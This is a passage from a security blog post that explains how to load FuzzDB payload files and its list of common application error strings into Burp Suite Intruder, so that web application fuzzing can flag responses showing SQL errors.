into the tool and test a web application, you can find the tutorial here. If you download the FuzzDB payloads you can select one of the payload files when you are defining your payloads in the Intruder tool. In the tutorial I used the grep option to identify any responses that contained the string “SQL syntax”. The FuzzDB provides a list of common application errors which you can load in to the grep function; this will allow you to identify any responses which include error strings such as “Microsoft OLE DB Provider for ODBC Drivers”. The FuzzDB wiki explains how to load the list of error strings in to the grep function. Links Burp Suite Intruder tool tutorial FuzzDB project page Adam Muntner blog and Twitter profile SN Improve your security testing with the FuzzDB Security Ninja
×
×
  • Create New...